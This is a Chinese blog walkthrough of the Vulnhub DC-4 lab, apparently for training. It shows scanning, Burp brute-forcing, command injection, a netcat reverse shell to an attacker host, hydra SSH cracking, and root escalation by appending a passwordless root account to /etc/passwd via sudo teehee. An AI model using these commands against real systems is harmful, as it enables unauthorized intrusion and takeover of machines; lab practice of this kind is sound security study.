DC系列靶场---DC 4靶场的渗透测试

于 2024-08-02 09:09:50 发布
阅读量716 收藏 20
点赞数 23
分类专栏: DC系列靶场 文章标签: 网络 前端 python windows 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhouA0221/article/details/140862972
版权

DC-4靶场渗透测试

信息收集

地址探测

使用arp-scan进行地址探测

arp-scan -l -I eth0

Nmap扫描

nmap -sS -sV -T4 -p- -o 172.30.1.131

目标主机开启了80端口、22端口。我们可以访问一下

http探测

暴力破解

使用Burp suite

猜解用户名为admin,密码随便写。

通过Burp suite抓包看到我们输入的参数,下面使用重放模块进行爆破。

把数据包发送到intruder模块中,快捷键ctrl+l。

选择攻击类型,这里有四种攻击类型

【sinper】狙击手:对单一参数进行密码爆破

【battering ram】撞锤:对所有参数进行同一个变量爆破(如用户名和密码一样)

【pitchfork】鱼叉:对所有参数进行一一对应爆破,传递两个参数两个字典,一一对应。

【cluster bomb】集束炸弹:对参数进行交叉爆破,常用用于不知道账号密码的情况

这里使用第一种攻击狙击手,对单一参数进行爆破

选中密码,点击add添加变量。

设置payloads

Payload set我们只对密码进行爆破所以这选择1

Payload type这里我们使用字典文件所以选择Payload type

如果是社区版的Burp suite现在就可以进行攻击

专业版是可以指定攻击的线程的,我这里指定的100,好像社区版线程是10吧。

点击Start attack开始攻击。

因为我使用的字典文件很大,我们这时候可以根据长度来分辨哪个是密码,因为正确密码只有一个,我们可以点length来区分真密码,我们看到密码是happy

用户名:admin

密码:happy

输入账号密码我们就登进了(可能因为靶机原因,如果等不进去,再输入一次就可以)

这里我们看到一个command,这个不就是命令的意思嘛。初步确定存在命令注入漏洞

username:admin
password:happy

漏洞探测及利用

命令注入

这里给我们提供了三个命令,都是可以执行的。

那我们是不是就可以使用Burp suite 进行拦截修改命令。

打开Burp suite的拦截功能,去网站执行三个命令哪个都可以。

这里看到最后一行ls -l 那我们修改看看账户文件。

输入查看账户文件的命令,发送到Repeater模块,点击send发送

cat /etc/passwd

拦截修改后是可以执行的,既然这样我们就直接去获取shell

利用nc获取shell

攻击端做监听,监听4444端口等待连接

nc -lnvp 4444

被攻击端主动连接我们的攻击端

nc -nv 172.30.1.20 4444 -c /bin/bash

这时候已经拿到目标主机的shell了

利用python获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

拿到shell之后我们要做信息收集

信息收集

先看一下账户文件

 cat /etc/passwd

看到这里有三个用户jim、sam、charles。

可以去看一下这三个用户下有什么文件

ls -l /home/jim

Charles、sam用户下面并没有什么东西,但是jim用户下面有个密码备份文件,那我们就可以使用这个密码备份文件进行爆破。

使用scp把这个文件传输到我们的kali上,因为这是通过ssh传输的,所以要确定kali开启了ssh服务。

scp /home/jim/backups/old-passwords.bak root@172.30.1.20:~

使用hydra进行爆破

hydra -L dc-4-user.txt -P dc-4-pass2.txt 192.168.195.142 ssh

用户名:jim

密码:jibril04

su - jim

看看邮箱有没有东西

用户邮箱的位置:/var/mail/用户名 或/var/spool/mail/用户名

cat /var/mail/jim

来自charles发来的一封邮件,我们看到这封邮件中有个密码。

那我们就登录一下吧

su - charles

已经登陆成功了。

提权

信息收集

列出所有可以以root执行的命令

sudo -l

可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件我们可以借助teehee往passwd写入一个root账号即可得到root权限查看一下这个命令的帮助手册,使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户

teehee提权

我们要先了解账户文件的格式

echo 'xiaofeixia::0:0::/root:/bin/bash' | sudo teehee -a /etc/passwd

写入之后我们直接登录,因为我们没有设置密码,登录的时候不用输入密码。

su - xiaofeixia

cat flag.txt

总结

1、在使用Burp suite进行暴力破解时,要熟悉工具中的模块,及攻击的四种类型,这样可以大大提高效率

2、Burp suite进行攻击时可以根据长度来快速找到密码,因为正确的密码只有一个。

3、无论是拿到shell之前还是拿到shell之后都要先进行信息收集,收集到的信息越多,我们的攻击面就更多

4、在做提权没有思路的时候,我们还是要进行信息收集,通过信息收集获得更多提权的方式。

白帽子二三
关注
  • 23
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 365
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2752
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1613
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
DC4靶场渗透流程(超详细)
m0_64583632的博客
04-10 955
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标
DC-4靶机进行渗透测试
zll___的博客
03-14 495
DC-4靶机进行渗透测试
DC4靶机的渗透测试(个人学习记录)
m0_53806046的博客
03-20 868
在执行这个命令时,如果你的桌面目录是 `/Users/your_username/Desktop`(这是 macOS 的典型路径),文件 `passwords.txt` 将会被创建或覆盖(如果已存在)在这个位置。在这里,它输出的文本是 `"***** root chmod 4777 /bin/sh"`,这看起来像是一个注释,但由于它后面跟着一个管道(`|`)操作符,实际上它是要传递给后面的程序的输入。3. **`sudo` 命令**:`sudo` 允许普通用户以超级用户(通常是 root)的权限执行命令。
DC4靶场
m0_62438849的博客
03-09 994
例如,网站可能是由静态文件组成,不需要后端数据库或复杂的CMS来管理内容。每个有效负载集都可以使用各种有效负载类型,并可以以不同的方式自定义每种负载类型。Payload type(负载类型):较为常用的有Simple list(简单列表)、Runtime file(运行文件)等。所谓“无法登录”,指的是仅是这个用户无法使用bash或者其他shell来登录系统而已,并不是说这个账号就无法使用系统资源。系统账号的shell使用/sbin/nologin,此时无法登录系统,即时给了密码也不行。
靶场DC-4
好好学习
11-28 737
每个靶场其实都多多少少能学到新东西,但时间久了,不用可能会忘记,因此写下来以作为记录。实际渗透环境复杂得多,所以靶场其实是一个练兵场。举一反三才重要!针对DC系列靶场,其实最终目标都是获取root下的flag,来吧,继续整吧。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1802
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
DC渗透系列DC-4靶场
xydsg的博客
02-05 724
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限。存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell。转换用户,发现一个teehee用户可以使用root无密码权限。teehee可以通过修改该文件达到添加用户的效果,文件格式为。linux的邮件目录是/var/spool/mail。抓个包,发现ls -l命令是radio参数后的值。把里面的密码取出来存着先 命名为jim.txt。backups里面有老密码,mbox不够权限。我们可以使用keehee添加root权限用户。
vulnhub靶场DC-4
kukudeshuo的博客
07-12 311
vulnhub靶场DC-4 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-4(192.168.58.147) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机的80端口 就是一个登入页面,不知道账号密码,所以没有多大用处 网站目录扫描
DC-4靶场实战
qq_42754807的博客
03-30 912
DC-4靶场实战
vulnhub DC4 靶场练习
鸥鹭忘机
08-16 642
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2980
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
Vulnhub靶场渗透-DC-4
paidx0
10-21 262
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值